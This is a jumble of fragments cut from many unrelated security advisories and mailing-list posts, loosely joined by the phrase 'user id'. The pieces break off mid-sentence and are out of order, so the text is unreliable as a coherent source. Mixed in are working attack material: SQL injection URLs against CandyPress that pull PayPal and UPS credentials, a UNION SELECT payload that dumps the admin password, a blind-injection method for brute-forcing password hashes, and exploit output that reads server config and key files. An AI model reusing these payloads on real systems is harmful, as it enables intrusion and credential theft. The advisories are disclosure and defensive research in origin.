User ID
Digital Security Research Group [DSecRG] Advisory #DSECRG-11-008
Application: Progress OpenEdge Enterprise RDBMS
Versions Affected: 10.2A and maybe others
Vendor URL: http://web.progress.com
Bug: Authentication bypass, UserID enumerate
Exploits: YES
Reported: 13.10.2009
Vendor response: 13.10.2009
Solution: NONE
Date of Public Advisory: 24.01.2011
        upass = line.split('-pass')[1]
        dn1 = 1
    elif line.find('-pass') == -1 and dn1 == 0:
        upass = ""
    if line.find('-id') != -1 and dn2 == 0:
        userid = line.split('-id')[1]
        dn2 = 1
    elif line.find('-id') == -1 and dn2 == 0:
        userid = ""
    if line.find('-port') != -1 and dn3 == 0:
$sessid = COM_applyFilter ($_COOKIE[$_CONF['cookie_session']]);
if ($_SESS_VERBOSE) {
COM_errorLog("got $sessid as the session id from lib-sessions.php",1);
}
$userid = SESS_getUserIdFromSession($sessid, $_CONF['session_cookie_timeout'], $_SERVER['REMOTE_ADDR'], $_CONF['cookie_ip']);
if ($_SESS_VERBOSE) {
COM_errorLog("Got $userid as User ID from the session ID",1);
}
-----------------------------------------------------------------------
Talsoft S.R.L. Security Advisory
WordPress User IDs and User Names Disclosure
-----------------------------------------------------------------------
I. Advisory information
Title: WordPress User IDs and User Names Disclosure
Advisory Id: TALSOFT-2011-0526
Advisory URL: http://www.talsoft.com.ar/index.php/research/security-advisories/wordpress-user-id-and-user-name-disclosure
Date published: 2011-05-26
configured to not follow the redirect, the whole page content is shown
to the attacker.
As the Owl Intranet Engine uses the PHP function extract() on the global
arrays $_POST and $_GET, it is possible to set the value of the global
variable $userid by passing it as a GET variable. Appending the string
"?userid=VALUE" to the URL allows an arbitrary value to be set for the
userid.
The initial "admin" user always has the id "1", so this value can be
used to get an administrative user's id. In the fIsAdmin() function, the
actions can be forged on behalf of the target user.
Notes:
- The victim's user ID ('id') parameter and course ID ('course'
parameter) are required for a successful attack. However, such values
are public as they can be obtained from many sections of the site such as:
user blogs ('/blog/')
chats
8.1. *Weak security question mechanism*
[CVE-2010-3272] The procedure to recover a lost password involves the
user answering a series of security questions set during enrollment.
After the recovery request and user ID have been sent, the system
requires the user to answer a certain number of security questions,
whose answers are then sent using a POST request, as seen below.
/-----
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
administrator account.
Preconditions
- No table prefix is being used
- The gallery functions are enabled for member profiles
- User-ID of an administrator account is 1
- The vBulletin database error page is unmodified and shows the executed
SQL as an HTML comment
- The account being used has permissions to modify gallery profile settings
1) Go to <forumroot>/profile.php?do=vbgalleryprofile
result page for the search
will be empty if @Condition is false and will show all links if
@Condition is true.
So we can replace @Condition with a query like
EXISTS (SELECT * FROM blazedb.dbo.aspnet_Membership WHERE
(LEN(Password) < 32) AND UserId=??)
and then brute force the length and then each character of the
password (of course
we first need to extract the user id from the username by another query like
the one above and then fill ?? with
the user id of the admin, which is the same process).
> > the PHP developers will reconsider in time.
> And they are right. Unix security, and therefore application security,
> cannot protect you from you, and if the attacker can run processes as you,
> as far as Unix is concerned, he is you. If you want to prevent attackers
> from making processes you run do things you don't want, don't let them run
> processes on your user id.
This is exactly what the patch I included does; it prevents users from running PHP scripts as the user ID.
>
> The only thing that could be done, would be to make the process running as
users in that jail will never be the same ones as the real system users.
You can specify the user set with the usual tools by specifying the
full user path, e.g.:
0/0 defines user id 0 (root) in virtual set 0 (e.g. system user root)
0/1000 defines user id 1000 in virtual set 0 (e.g. a system user)
1/secoff defines user secoff in virtual set 1 (e.g. with uid 400)
2/1000 defines user id 1000 in virtual set 2 (for example, mail users
could be in set 2)
> -- Vim README.txt
>
> ``Netrw supports "transparent" editing of files on other machines
> using [...] vim ftp://hostname/path/to/file''
>
> ``Attempts to use ftp will prompt you for a user-id and a password.
> These will be saved in global variables g:netrw_uid and
> s:netrw_passwd; subsequent uses of ftp will re-use those two items
> to simplify the further use of ftp. However, if you need to use a
> different user id and/or password, you'll want to call NetUserPass()
> first.''
# / Trying to create a database
# + Database 92xpl_db39 successfully created
# + Using database id 12
# / Trying to add SQL user
# + User 93xpl_usr2 successfully created
# + Using SQL user id 17
# + Host thegoodone.com is a valid user
# + Logged in (thegoodone.com - Client)
# / Trying to load files via local_infile
# + Ok: /etc/vhcs2/vhcs2.conf
# + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
The web application uses cookie parameters passed via HTTP
requests to identify which user is logged in. Authentication
routines can be bypassed by simply appending the below POC
string to a cookie which already contains a valid ASP.NET
session ID. The value given to the various cookie parameters
indicates the specific user ID for the application user the
attacker wishes to impersonate.
Proof of Concept.
To exploit this vulnerability, simply browse to the software
to automatically create a valid ASP.NET session ID. Once
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
echo "<p class='loginusername'><a
href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
There is a fairly serious SQL Injection issue in CS-Cart that, as
mentioned before, allows attackers to easily bypass authentication, or
retrieve arbitrary data from the underlying database. The vulnerable
code can be found in /core/user.php
if (fn_get_cookie(AREA_NAME . '_user_id')) {
$udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login,
membership_status,
membership_id FROM $db_tables[users] WHERE
user_id='".fn_get_cookie(AREA_NAME . '_user_id')."'
AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
ppUsername:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppUserName'%20or%20'2'='1&action=get&inventory=1
ppSignature:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppSignature'%20or%20'2'='1&action=get&inventory=1
----
UPS UserID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSUserID'%20or%20'2'='1&action=get&inventory=1
UPS Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSPassword'%20or%20'2'='1&action=get&inventory=1
UPS Access ID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSAccessID'%20or%20'2'='1&action=get&inventory=1
The Oracle XML DB ftp service contains problems with auditing logins.
Details
*******
When a user attempts to log in via the XDB ftp service the audit trail shows
an incorrect entry for USERID. This can present two subtle problems.
Firstly, if a user logs in as "SYSTEM" the USERID column only shows "SYSTE"
- only 5 characters. The second problem is that if the same user then
attempts to log in a user "FOO", "FOOTE" is logged in the USERID column -
the "TE" coming from the "TE" of "SYSTE[M]" - the previous login. This only
happens on the same connected TCP circuit; as such all audit entries have
========
1.1
Multiple remote SQL Injection vulnerabilities are detected in MYREs Real Estate Mobile Application (2012 Q2).
The vulnerability allows a remote attacker or a local low-privileged user account to inject and execute their own SQL commands
on the affected application's DBMS. Successful exploitation of the vulnerability results in DBMS and application compromise.
The vulnerability is located in the listings and agent profile modules, with the bound vulnerable parameters userid and link_idd.
Vulnerable Module(s):
[+] Listings > Link_IDD
[+] Agent Profile > UserID
Affected file: includes/classes/Authenticate.class.php
023: define("COOKIE_USER", COOKIE_PREFIX."user");
024: define("COOKIE_ADMIN", COOKIE_PREFIX."admin");
147: $cookieDataArr = explode(".", $_COOKIE[COOKIE_USER]);
150: list($userID, $cookieExpiration, $cookieHash) = $cookieDataArr;
153: $result = dbquery(
154: "SELECT * FROM ".DB_USERS."
155: WHERE user_id='".$userID."' AND user_status='0' AND user_actiontime='0'
156: LIMIT 1"
157: );
~~~~~~---->Unregistered user (get var --> 'letra'):
http://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*
<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>
~~~~~~---->Registered user (get vars --> 'y' and 'm'):
http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*
And they are right. Unix security, and therefore application security,
cannot protect you from you, and if the attacker can run processes as you,
as far as Unix is concerned, he is you. If you want to prevent attackers
from making processes you run do things you don't want, don't let them run
processes on your user id.
The only thing that could be done, would be to make the process running as
another user id, that is the php instance running from suexec, completely
distrust any input it gets from the webserver. That way, what the attacker
can do is limited to what php lets him do.
if( $this->p_uname )
$this->msg('Using targeted username '.$this->p_uname, 1);
elseif( $this->p_uid )
$this->msg('Using targeted user id '.$this->p_uid, 1);
# Target
if( !($this->p_uname || $this->p_uid) )
{
# Default uid if not precised
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
> kernel/exit.c in the kernel source tree (version 2.6.22).
Dan, could you take a closer look at what setuid(0) does? In the beginning
of the setuid manual page you can read that:
setuid sets the effective user ID of the current process.
If the effective userid of the caller is root, the real
and saved user ID's are also set.
In this case check_kill_permission() returns -EPERM for unprivileged
parent.
> > kernel/exit.c in the kernel source tree (version 2.6.22).
>
> Dan, could you take a closer look at what setuid(0) does? In the beginning
> of the setuid manual page you can read that:
>
> setuid sets the effective user ID of the current process.
> If the effective userid of the caller is root, the real
> and saved user ID's are also set.
>
Yes, I knew that before.
The FPUpdater tool (Floating Point Updater) must be run to update the Java Development Kit (JDK) and/or the Java Runtime Environment (JRE). This tool can be used to update all versions of HP-UX Java.
To download the FPUpdater tool, go to https://www.hp.com/go/java then click on the link for the FPUpdater tool.
An HP Passport user ID is required to download the FPUpdater tool and its Readme file. For information on registering for an HP Passport user ID, refer to: https://passport2.hp.com
MANUAL ACTIONS: Yes - Update
Update using FPUpdater
* SQL Injection *
An SQL Injection vulnerability is caused by assigning a variable from client
data, for example in file shopsessionsubs.asp in Function Getwebsess:
userid=cleanchars(request("websess"))
and:
userid = Request.Cookies(cookiename)
In Sub ResponseCookies variable userid is assigned to variable websess by a
call to Getwebsess and variable websess is concatenated with other data to
id = $id"); // <- id is used without clean up
other example:
1490 function remove_post(){
1491 global $user_level, $user_ID, $wpdb;
1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned
1493 $author = $wpdb->get_var("SELECT author_id from
$this->t_posts where id = $id"); // id is used without clean up
...
1503 if($del == "ok"){